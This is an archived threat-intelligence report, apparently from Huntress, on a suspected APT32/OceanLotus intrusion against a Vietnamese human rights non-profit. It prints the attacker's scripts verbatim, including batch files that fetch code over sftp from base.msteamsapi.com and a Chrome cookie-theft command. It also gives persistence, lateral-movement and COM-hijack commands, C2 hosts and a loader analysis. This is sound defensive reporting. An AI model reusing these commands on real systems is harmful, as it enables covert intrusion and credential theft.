{
	"id": "8e4583cd-f495-4d65-81bd-0603ffc600b3",
	"created_at": "2026-04-06T02:11:34.617921Z",
	"updated_at": "2026-04-10T03:36:22.192755Z",
	"deleted_at": null,
	"sha1_hash": "852cbe8c6c47d67b263065f52eb34b409d2a4f7a",
	"title": "Advanced Persistent Threat Targeting Vietnamese Human Rights Defenders",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10423781,
	"plain_text": "Advanced Persistent Threat Targeting Vietnamese Human Rights\r\nDefenders\r\nBy Jai Minton, Craig Sweeney\r\nPublished: 2024-08-28 · Archived: 2026-04-06 02:06:47 UTC\r\nExecutive Summary\r\nIt doesn’t matter if you’re a small organization, a non-profit, or a Fortune 500 company, there’s always someone who will\r\nwant access to your information. In many instances, this access is primarily for financial gain; however, for many non-profits and small organizations the harsh reality is that the nature of their work, or their clients, also makes them an ideal\r\ntarget for intelligence gathering and espionage-motivated threat actors. \r\nThreat hunters at Huntress recently discovered an intrusion on a Vietnamese human rights defender’s machine which is\r\nsuspected to have been ongoing for at least four years. This intrusion has a number of overlaps with known techniques used\r\nby the threat actor APT32/OceanLotus, and a known target demographic which aligns with APT32/OceanLotus targets. This\r\npost highlights just how far advanced threats will go for information gathering purposes when it aligns with their strategic\r\ninterests.\r\nBackground\r\nHuntress regularly performs threat hunting operations to find intrusions that may have slipped past normal security defenses.\r\nIn a recent case, Huntress analysts identified an intrusion against a non-profit supporting Vietnamese human rights which\r\nhas likely spanned the course of at least four years. While detections in the Huntress platform found some anomalous\r\nactivity which was reported to the Huntress partner, the threat hunting team was able to find well-hidden persistence, and\r\nactions taken by the threat actor. This information was then used to piece the intrusion together and trace it back long before\r\nthe Huntress agent was deployed. \r\nHunting Methodology\r\nHuntress is uniquely positioned to look for threat actors across millions of systems. 
This comes through the combination of\r\nprocess behavior insights and persistent footholds gathered from the Huntress EDR. Leveraging process behavior insights,\r\nthreat hunters use intelligence, or a hypothesis, and their knowledge of what is normal on a system to create threat hunting\r\nrules. These rules differ from product detections as they are generally higher in frequency, and lower in efficacy given they\r\ntarget techniques used by threat actors who are trying to blend into an environment. Using created hunting rules, threat\r\nhunters often take three different approaches to threat hunting including looking for: rare hunting signals, multiple signal\r\nclusters, and statistical anomalies.\r\nThe Huntress Managed EDR consistently identifies persistent footholds on a system. This allows threat hunters to locate\r\nanomalies where a persistent foothold may be found on a small subset of the systems protected by Huntress. These\r\nanomalies could be a difference in persistence mechanism, name, binary, or another attribute to what is normally seen across\r\nother Huntress partner environments. Whilst investigating a new hunting signal, it was found that a system would\r\ninfrequently and inconsistently run a small number of administrative commands from an unusual process. \r\nThe admin commands run were deliberate and rarely exceeded three commands in a ten minute period, with a max of twelve\r\nbeing run on a system during any given day. 
Despite this, the unusual activity was enough to raise the attention of Huntress\r\nthreat hunters who proceeded to look over persistent footholds in the partner environment and piece together the larger scale\r\nof this intrusion.\r\nInvestigation and Analysis\r\nHost 1\r\nPersistence Mechanisms\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 1 of 29\n\nFigure 1: Diagram of Persistence Mechanisms on host 1\r\nWhile onboarding to Huntress, host 1 presented with a scheduled task titled Adobe Flash Updater:\r\nScheduled Task 1\r\nTask Path: Adobe Flash Updater\r\nExecutable: c:\\windows\\system32\\wscript.exe\r\nArguments: /Nologo /E:VBScript C:\\ProgramData\\AppData\\Roaming\\Adobe\\Updater\\scheduler\\scheduler.ps1:log.txt\r\nThe referenced scheduler.ps1:log.txt is an alternate data stream named log.txt within a file named scheduler.ps1. This file\r\nhad already been removed prior to the Huntress agent being deployed; however, the naming convention and use of an alternate\r\ndata stream have some overlap with public reporting by Cybereason detailing a VBS and PowerShell-based loader used to\r\nload Metasploit and Cobalt Strike payloads.\r\nIn the following weeks, new scheduled tasks were created on the host and identified by the Huntress agent roughly 10 days\r\napart:\r\nScheduled Task 2\r\nTask Path: AdobeUpdateTaskUser\u003cSID\u003e\r\nExecutable: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Java\\bin\\javaw.exe\r\nArguments: -jar C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Adobe\\Acrobat\\adobe.jar mi54giwp\r\nThis scheduled task referenced a malicious Java Archive (JAR) file which was specifically created for the user and system in\r\nquestion.
The malware contained a hard-coded reference to a file C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\Acrobat\\adobe.png which contained potentially encrypted shellcode or configuration\r\nthat was to be loaded by an embedded DLL within the Java Archive named mi54giwp.dll. The above scheduled task was\r\nsubsequently interactively launched by the threat actor using the native Windows schtasks.exe executable:\r\nschtasks /run /TN \"AdobeUpdateTaskUser\u003cSID\u003e\"\r\nScheduled Task 3\r\nTask Path: WinDefenderAntivirusUpdateTaskUser\u003cSID2\u003eCore\r\nExecutable: wscript\r\nArguments: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\MSSharePoint.vbs\r\nThis scheduled task contained a different user SID than the one found in the AdobeUpdateTaskUser scheduled task. The\r\nMSSharePoint.vbs script was designed to use a private key already placed on disk, authenticate to a remote SFTP server,\r\nand download and run a script called cloud.bat.\r\nThe cloud.bat file used the same private key to authenticate to the same remote SFTP server, and pulled down a file called\r\ncloudlog.txt.\r\n@echo off\r\nset user=MSSHAREUTHVBA\r\nset destination_folder=%AppData%\\Microsoft\\Windows\\CloudStore\\\r\nset sftpath=sftp.exe\r\nset vbs=%destination_folder%MSSharePoint.vbs\r\nif exist \"%windir%\\System32\\OpenSSH\\sftp.exe\" (\r\ngoto upload\r\n) else (\r\nset sftpath=%destination_folder%%sftpath%\r\ngoto upload\r\n)\r\n: upload\r\n%sftpath% -P 6291 -o StrictHostKeyChecking=no -i %destination_folder%id_rsa %user%@base.msteamsapi.com:/%user%/cloudlog.txt %destination_folder\r\nAt the time of investigation there was no cloudlog.txt file on disk.
Modification timestamps on the private key, SFTP, and\r\nSSH binaries all indicate that they were possibly present since November 2023.\r\nLess than a day later, schtasks.exe was used to create persistence that would run cloud.bat once every 5 hours.\r\nschtasks /create /sc minute /mo 300 /tn Handler{60396-307392-03497-03790-3702046} /tr \"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\cloud.bat\" /f\r\nScheduled Task 4\r\nTask Path: Handler{60396-307392-03497-03790-3702046}\r\nExecutable: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\cloud.bat\r\nCreation of the Handler scheduled task was later found to have originated from a DllHost surrogate process which was\r\nexecuting a DLL from a COM object stored in the registry with the identifier {1F7CFAF8-B558-4EBD-9526-203135A79B1D}.\r\nParent Process: C:\\WINDOWS\\SysWOW64\\DllHost.exe /Processid:{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nProcess: cmd /c schtasks /create /sc minute /mo 300 /tn Handler{60396-307392-03497-03790-3702046} /tr \"%AppData%\\Microsoft\\Windows\\CloudStore\\cloud.bat\" /f\r\nIt was found that this process was being launched from another scheduled task that had been set up prior to Huntress\r\ndeployment.\r\nScheduled Task 5\r\nTask Path: UpdateLibrary_{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nDescription: This task updates the cached list of folders and the security permissions on any new files in a user’s shared\r\nmedia library.\r\nCOM Handler: {1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nTask File Creation Date: 2020-06-04\r\nThis task attempted to masquerade as the legitimate UpdateLibrary task on the system and had an identical description to\r\nthe legitimate UpdateLibrary scheduled task also on the system. The task creation and modification timestamps indicate it\r\nwas first set up in June of 2020.
The StartBoundary within the XML file used for this Scheduled Task also had a timestamp\r\nvalue of 2020-01-01T00:00:00 indicating that the task was expected to be run from the start of 2020 onwards.\r\nAlthough the scheduled task didn’t have an executable set to run, it did have a COM Handler that was to be invoked.\r\nAnalysis of the host found a COM object set up using registry keys.\r\nCOM Object\r\nPurpose: Specify that DllHost.exe would run as the surrogate process for a given application\r\nRegistry Key: HKU\\\u003cSID\u003e\\Software\\Classes\\AppID\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nRegistry Entry Value: DllSurrogate\r\nRegistry Entry Data: 0\r\nPurpose: Correlate application identifier with its COM object identifier\r\nRegistry Key: HKU\\\u003cSID\u003e\\Software\\Classes\\WOW6432Node\\CLSID\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nRegistry Entry Value: AppID\r\nRegistry Entry Data: {1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nPurpose: Specify the server DLL to be executed by the COM object identifier\r\nRegistry Key: HKU\\\u003cSID\u003e\\Software\\Classes\\WOW6432Node\\CLSID\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\InProcServer32\r\nRegistry Entry Value: (Default)\r\nRegistry Entry Data: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\cachuri.dll\r\nThe COM object DLL set to run (cachuri.dll) was a signed, legitimate iisutil.dll used by IIS Express, which happened to match a rule\r\ncreated by Florian Roth from Nextron Systems 5 years ago called APT_OceanLotus_ISSUTIL_Sep18.
Although this\r\nmatch was a false positive, a malicious sample was found on VirusTotal matching this rule, which was submitted with the\r\nnames iisutil.dll and iisutil2.dll.\r\nThis sample has been flagged by some AV engines as being tied to APT32/OceanLotus and has significant overlap with\r\nanother DLL found on disk called iisutil2.dll. Further analysis of the DLL and 2 other files, which together act as a\r\nbackdoor, is presented in the section \"Analysis of Malware.\"\r\nFigure 2: Classification of OceanLotus on VirusTotal\r\nA few weeks following the creation of these scheduled tasks, an enumeration command was observed on the host looking\r\nfor the current user’s privileges.\r\nwhoami /priv\r\nThe next day, a forced restart was performed on a remote host. This same action was performed on another system roughly\r\ntwo weeks following execution on the first.\r\ncmd /c shutdown /r /m \\\\\u003cremote ip\u003e /t 0 /f\r\nWe don’t know the intent of this action, but speculate it may have been to ensure execution of malware on a remote system\r\nor to ensure any system configuration changes are applied.\r\nOver the next few months, various discovery commands were performed to ensure access to remote workstations from host\r\n1. Actions were taken to ensure network connectivity was still active on the host and remote hosts.\r\nnet view \\\\\u003cremote ip\u003e /all\r\nnet use \\\\\u003cremote ip\u003e /u:\"\u003cdomain\u003e\\\u003cuser\u003e\" \"\u003cpassword\u003e\"\r\nnetstat -ano\r\nipconfig /all\r\nA run key was found on host 1 which referenced a McAfee OEM Module binary (mcoemcpy.exe) masquerading as\r\nWdiServiceHost.
A DLL used for sideloading was not found at the time of investigation; however, public reporting by\r\nESET is available which states that this executable is vulnerable to loading a malicious DLL named McUtil.dll.\r\nRun Key 1\r\nPurpose: Launch an executable known to be vulnerable to DLL Sideloading when user logs in\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry Entry Value: WdiServiceHost\r\nRegistry Entry Data: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\WdiServiceHost_339453944\\WdiServiceHost.exe\r\nA second run key was found on host 1 referencing an Apple Software binary (SoftwareUpdate.exe) with a revoked code\r\nsignature. This persistence mechanism was unique across Huntress customers and it’s believed this was used to sideload a\r\nmalicious DLL. The DLL used for sideloading was not found at the time of investigation; however, public reporting by\r\nRecorded Future is available which states that this executable is vulnerable to loading a malicious DLL\r\nnamed SoftwareUpdateFilesLocalized.dll.\r\nRun Key 2\r\nPurpose: Launch an executable known to be vulnerable to DLL Sideloading when user logs in\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry Entry Value: Apple Software Update Cache\r\nRegistry Entry Data: C:\\ProgramData\\Apple\\Installer Cache\\SoftwareUpdate.exe\r\nYet another run key was found on host 1 referencing a batch script called connection.bat.
This had identical functionality to\r\nMSSharePoint.vbs except it launched PowerShell to run SFTP rather than a VBS script.\r\nRun Key 3\r\nPurpose: Launch a batch script when user logs in\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry Entry Value: ChromeUptodate\r\nRegistry Entry Data: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\connection.bat\r\n@echo off\r\npowershell -WindowStyle Hidden -executionpolicy bypass -Command \"Start-Process -WindowStyle Hidden -FilePath sftp.exe -ArgumentList '-P','6291','-o','StrictHostKeyChecking=no', '-i', 'C:\\Users\\\u003cRedacted\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\id_rsa MSSHAREUTHVBA@base.msteamsapi.com:/MSSHAREUTHVBA/cloud.bat', 'C:\\Users\\\u003cRedacted\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\'\"\r\nRight before isolation occurred on this system, the threat actor was seen attempting to steal Google Chrome cookies for all\r\nuser profiles on the system from the DllHost COM object backdoor.\r\ncmd /c for /f \"tokens=*\" %G in ('dir /b \"%localappdata%\\Google\\Chrome\\User Data\\Profile *\"') do copy \"%localappdata%\\Google\\Chrome\\User Data\\%G\\Network\\Cookies.bak\" \"%localappdata%\\Google\\Chrome\\User Data\\%G\\Cookies\" /y\r\nHost 2\r\nPersistence Mechanism\r\nFigure 3: View of Persistence Mechanism on host 2\r\nA separate host, host 2, had remote commands run via Windows Management Instrumentation to execute a batch script\r\napproximately 1.5 months after the first observed action on host 1.
This batch script was used to query processes running on\r\nthe host.\r\ncmd.exe /c C:\\Users\\Public\\Downloads\\1.bat\r\nThe batch script content is below:\r\nwmic process get name, executablepath, sessionid, processid \u003e C:\\Users\\Public\\Downloads\\1.txt\r\nDomain discovery commands were also observed on this system shortly after this.\r\nnet group \"Domain Admins\" /domain\r\nnltest /dclist:\u003cREDACTED\u003e.local\r\nThe process which initiated this was a legitimate version of the calibre eBook management executable calibre.exe which\r\nhad been set up to run as a task. Through Huntress telemetry, it was seen that an attempt was made to create a scheduled task\r\nto run this calibre.exe executable from an unusual location.\r\nschtasks /create /sc MINUTE /mo 300 /tn \"Microsoft\\Windows\\WindowsColorSystem\\Calibration_Update\" /tr \"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\Calibre.exe\" /f\r\nScheduled Task 1\r\nTask Path: Microsoft\\Windows\\WindowsColorSystem\\Calibration_Update\r\nExecutable: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\Calibre.exe\r\nIt should be noted that this is an attempt to blend in with the legitimate “Calibration Loader” task generally seen at\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader.
We speculate that the\r\n“Calibration Loader” task was chosen because of its similar naming to the file calibre.exe.\r\nSoon after this execution there was attempted privilege escalation via named pipes performed through the calibre process.\r\nThis likely involved injection into the legitimate Windows gpupdate.exe process, which is a known process commonly\r\ninjected into through the use of malleable Cobalt Strike profiles and is commonly seen when running the ‘getsystem’\r\ncommand from Cobalt Strike.\r\nGrandparent:\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\r\nParent:\r\nC:\\windows\\sysnative\\gpupdate.exe\r\nProcess:\r\nC:\\Windows\\system32\\cmd.exe /c echo a0e3d8a67d0 \u003e \\\\.\\pipe\\a64009\r\nAnalysis of this host found the calibre executable running a malicious DLL called calibre-launcher.dll on disk; however,\r\nwithin minutes, before the DLL and executable could be obtained, the threat actor appears to have killed the\r\nrunning process and removed the entire SPMigration directory, including the implant. At the time of investigation, there was a\r\nsuspicious entry still in the system DNS cache:\r\nIP DNS Entries\r\n91.231.182[.]18 kpi.msccloudapp[.]com\r\nAlthough we weren’t able to confirm that this lookup was related to the intrusion in question, the domain was similar to one\r\nseen previously (msteamsapi[.]com) and the subdomain also had overlap with a subdomain seen on host 4.\r\nHost 3\r\nPersistence Mechanism\r\nFigure 4: View of Persistence Mechanism on host 3\r\nShortly after performing named pipe impersonation on host 2, a command was run using the same Cobalt Strike beacon in\r\nan attempt to create a scheduled task on a third system.
This scheduled task was set to run every 15 minutes as the SYSTEM\r\nuser account (Note: the task name resembles a license key and as such has been redacted as a precaution).\r\nschtasks.exe /u \"\u003cREDACTED\u003e\\\u003cREDACTED\u003e\" /p \"\u003cREDACTED\u003e\" /S \u003cREDACTED\u003e /create /SC MINUTE /MO 15 /TN \"\u003cREDACTED\u003e\" /TR \"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\" /RU \"NT AUTHORITY\\SYSTEM\" /K /f\r\nScheduled Task 1\r\nTask Path: \u003cREDACTED\u003e\r\nExecutable: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\r\nShortly after this, a command was run to invoke the calibre executable.\r\nwmic /node:\u003cREDACTED\u003e /user:\u003cREDACTED\u003e /password:\u003cREDACTED\u003e process call create \"cmd.exe /c start c:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\"\r\nAt the time of investigation, the executable and DLL weren’t found on disk.\r\nHost 4\r\nPersistence Mechanisms\r\nFigure 5: Diagram of Persistence Mechanisms on host 4\r\nUsing available Huntress telemetry, a search was run to find any other instances where the calibre executable was set to run\r\nat startup.
Three scheduled tasks were found on the system, two of which were masquerading as legitimate Adobe\r\nexecutables, with the other masquerading as a Microsoft update task.\r\nScheduled Task 1\r\nTask Path: Adobe Acrobat Update Task\r\nExecutable: C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\r\nScheduled Task 2\r\nTask Path: MicrosoftOne\\Uptodate\r\nExecutable: C:\\programdata\\Microsoft\\AppV\\ins-findstr.exe\r\nScheduled Task 3\r\nTask Path: Adobe Acrobat Update Task_v2\r\nExecutable: C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeUpdate.exe\r\nAnalysis of network connections on the system showed that one of the calibre executables posing as Adobe\r\n(AdobeARM.exe) previously had a network connection to a remote IP address.\r\nIP DNS Entries\r\n51.81.29[.]44 kpi.adcconnect[.]me\r\nBased on analysis of this infrastructure and malicious calibre-loader.dll files submitted to VirusTotal, this IP address and\r\nthe calibre.exe implant were likely tied to a Cobalt Strike Team Server.\r\nMonths after our initial detection on host 1, user privilege discovery was observed via a different calibre.exe process.\r\nwhoami /priv\r\nWeeks following this command we observed a new service created to run a legitimate node executable. This executable was\r\nset to launch a malicious Node addon binary to evade detection on the system.\r\nService 1\r\nName: Adobe_Reader\r\nExecutable: C:\\programdata\\adobe\\node.exe\r\nArguments: -e require('C:\\ProgramData\\adobe\\1lpiozkc.node')\r\nThe Node addon was created to specifically target the system and user account and included a hardcoded path to a file on\r\ndisk at C:\\Programdata\\Adobe\\ms-adobe.bin. This also included a hardcoded service name to be created called\r\nSrvAdobeUpd; however, at the time of investigation, this wasn’t found on the system.
Analysis of network connections on\r\nthe system showed that this node executable previously connected to a remote IP address.\r\nIP DNS Entries\r\n5.230.35[.]192 dupleanalytics[.]net, get.dupbleanalytics[.]net\r\nBased on analysis of this infrastructure and the malicious node file, it’s believed that this was likely tied to a Cobalt Strike\r\nTeam Server.\r\nAbout a month following the Node addon being launched we observed a scheduled task creation spawning from the\r\nnode.exe process.\r\nParent Process:\r\nC:\\programdata\\adobe\\node.exe -e require('C:\\\\ProgramData\\\\adobe\\\\1lpiozkc.node')\r\nProcess:\r\nC:\\WINDOWS\\system32\\cmd.exe /C schtasks /create /sc MINUTE /mo 15 /tn \"96d09a49-98ed-4b12-936a-c8715d2d2c0e\" /tr \"C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\bin\\javaw.exe -jar C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msadobe.jar zfhqq01v\" /f\r\nThis scheduled task was set to run a JAR file which would load an embedded DLL into memory.\r\nScheduled Task 4\r\nTask Name: 96d09a49-98ed-4b12-936a-c8715d2d2c0e\r\nExecutable: C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\bin\\javaw.exe\r\nArguments: -jar C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msadobe.jar zfhqq01v\r\nFurther analysis on msadobe.jar is mentioned in the following section.\r\nSupporting Analysis\r\nIt’s most likely that this is only the tip of the iceberg and that the true extent of this intrusion stretches well beyond systems\r\nwith the Huntress agent. Preliminary analysis was conducted into the malware found on these systems, and infrastructure\r\nused in the intrusion. This was done as a way of determining any known overlap with threat actor techniques which align\r\nwith the target industry or demographic of the victim organization.\r\nAnalysis of Malware\r\nSeveral binaries and files were involved in this intrusion.
A summary of these files is included below.\r\nLocation Hash (SHA256)\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\cachuri.dll aa5ff1126a869b8b5a0aa72f609215d8e3b73e833c60e4576f2d3583cc5af4\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft Compatibility Appraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\cachuri.dll aa5ff1126a869b8b5a0aa72f609215d8e3b73e833c60e4576f2d3583cc5af4\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\AD RMS Rights Policy Template Management (Automated)\\{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\\cachuri.dll aa5ff1126a869b8b5a0aa72f609215d8e3b73e833c60e4576f2d3583cc5af4\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft Compatibility Appraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\iisexpressshim.sdb 09f53e68e55a38c3e989841f59a9c4738c34c308e569d23315fd0e2341195\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\iisexpressshim.sdb 09f53e68e55a38c3e989841f59a9c4738c34c308e569d23315fd0e2341195\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\AD RMS Rights Policy Template Management (Automated)\\{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\\iisexpressshim.sdb a217fe01b34479c71d3a7a524cb3857809e575cd223d2dd6666cdd47bd28\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\iisutil2.dll 47af8a33aac2e70ab6491a4c0a94fd7840ff8014ad43b441d01bfaf9bf6c4a\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\logo.png 82e94417a4c4a6a0be843ddc60f5e595733ed99bbfed6ac508a5ac6d4dd31\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft Compatibility Appraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\logo.png f8773628cdeb821bd7a1c7235bb855e9b41aa808fed1510418a7461f7b82\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\AD RMS Rights Policy Template Management (Automated)\\{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\\logo.png aa69c6c22f1931d90032a2d825dbee266954fac33f16c6f9ce7714e012404\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe 735e7b33b97bff3cf6416ed3b8ed7213d7258eec05202cbf8f8f8002c6435f\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre-launcher.dll Unknown\r\nC:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msadobe.jar 300ef93872cc574024f2402b5b899c834908a0c7da70477a3aeeaee2e458a\r\nzfhqq01v.dll (inside msadobe.jar) 6719175208cb6d630cf0307f31e41e0e0308988c57772f25494c9d2a2b84\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Adobe\\Acrobat\\adobe.jar efc373b0cda3f426d25085938cd02b7344098e773037a70404c6028c76cc\r\nmi54giwp.dll (inside adobe.jar) a79ced63bdf0ea69d84153b926450cf3119bdea4426476b37dfde2a48a6ed\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Adobe\\Acrobat\\adobe.png a6072e7b0fafb5f09fd02c37328091abfede86c7c8cb802852985a37147bfa\r\nC:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msreader.bin Unknown\r\nC:\\ProgramData\\adobe\\ms-adobe.bin 8e2e9e7b93f4ed67377f7b9df9523c695f1d7e768c3301db6c653948766ff\r\nC:\\ProgramData\\adobe\\1lpiozkc.node b31bfa8782cb691178081d6685d8429a2a2787b1130c6620d3486b4c3e02\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Installer\\{02594FE8-1152-E41E-A75E-923494C7B453}\\DropboxUpdate.bin c7e2dbc3df04554daa19ef125bc07a6fa52b5ea0ba010f187a082dc9fc2e97\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Installer\\{02594FE8-1152-E41E-A75E-923494C7B453}\\DropboxUpdate.exe 47839789332aaf8861f7731bf2d3fbb5e0991ea0d0b457bb4c8c1784f76c7\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Installer\\{02594FE8-1152-E41E-A75E-923494C7B453}\\goopdate.dll c03cc808b64645455aba526be1ea018242fcd39278acbbf5ec3df544f9cf95\r\nDuring analysis of host 1, it was found that the legitimate cachuri.dll set to run as a COM object would explicitly import\r\nand run code from iisutil2.dll. Although iisutil2.dll had almost identical information to a signed, valid copy of iisutil.dll,\r\nthis had been patched to run different code, and was modified to increase the file size above 50MB. It’s believed this was\r\ndone to evade a number of YARA rules which often have file size constraints, and to prevent submitting the file to online\r\nsandboxing tools, many of which have a file size limit of 50MB. This modification caused notable differences in the NT\r\nHeader, Optional Header, and most significantly the .text section.\r\nFigure 6: View of .text section of iisutil2.dll compared with a legitimate version\r\nThe entry point of this DLL had also been modified to offset 0x00025FB0 (155568) which differed from the original entry\r\npoint of 0x00027FB0 (163760).
A brief analysis of this binary showed it pushed the return address to the stack and then ran\r\na function at 0x1002711e.\r\nFigure 7: Disassembly: View of call to function at 0x1002711e\r\nThis is significant because these operations, the entry point, and the address of the function to be run are all identical to the\r\npreviously mentioned malware submitted to VirusTotal which is tied to APT32/OceanLotus. A closer inspection showed that\r\nthis file was actually identical to the sample on VirusTotal tied to OceanLotus mentioned earlier, with the only difference\r\nbeing data appended to it so that its file size grew above 50MB.\r\nFigure 8: Comparison view of the newly found binary to a known binary from VirusTotal\r\nIn contrast, the legitimate DLL would begin setting up necessary registers before having a branch condition depending on\r\nthe arguments passed to the executable running the DLL.\r\nFigure 9: Disassembly of the legitimate iisutil2.dll binary\r\nThe malicious DLL would then search the Process Environment Block (PEB) for a PEB_LDR_DATA structure so that it can\r\nidentify the InLoadOrderModuleList. This structure contains a list of DLLs in the order that they were loaded.\r\nFigure 10: Disassembly: Searching for the DllBase in one of the lists of loaded DLLs\r\nThe code includes multiple jump operations, such as the one shown in Figure 10, which would never be taken, or would\r\nonly be used to run a small number of instructions, before returning to the original flow of execution.\r\nFigure 11: Disassembly: Getting the pointer to the buffer of the first module\r\nInterestingly, this malware contains a number of garbage op-codes and control flow obfuscation to throw off static analysis\r\nand break disassembly.
This overlaps with techniques known to be used by APT32/OceanLotus as previously reported by\r\nESET.\r\nFigure 12: Disassembly: View of unused JMP and junk code\r\nFigure 13: Disassembly: View of Failure to Disassemble junk code and getting pointer to DLL export directory.\r\nThis malware looks at the DLLs loaded and their exports so that it can dynamically resolve APIs used to facilitate\r\ndecryption and injection of a payload into memory. This has significant overlap with malware reported by\r\nBlackBerry/Cylance called Steganography Loader #2.\r\nAnalysis revealed that this DLL would ultimately read in iisexpressshim.sdb, decrypt it using an XOR key of 0xFF, and\r\nthen decompress the data using the LZNT1 compression algorithm. The decrypted iisexpressshim.sdb file showed more\r\ninstances of junk op-codes being present which would never be evaluated.\r\nFigure 14: Disassembly: View of more junk code from iisexpressshim.sdb\r\nThe decrypted DLL in memory would then load logo.png, use a custom steganography routine, and then make a call to the\r\nWindows CryptDecrypt API to decrypt and load the final DLL into memory. The use of a custom steganography routine to\r\nhide malicious code in a seemingly benign PNG file, in addition to use of a XOR key and compression, has overlap with the\r\npreviously mentioned Steganography Loader used by APT32/OceanLotus.
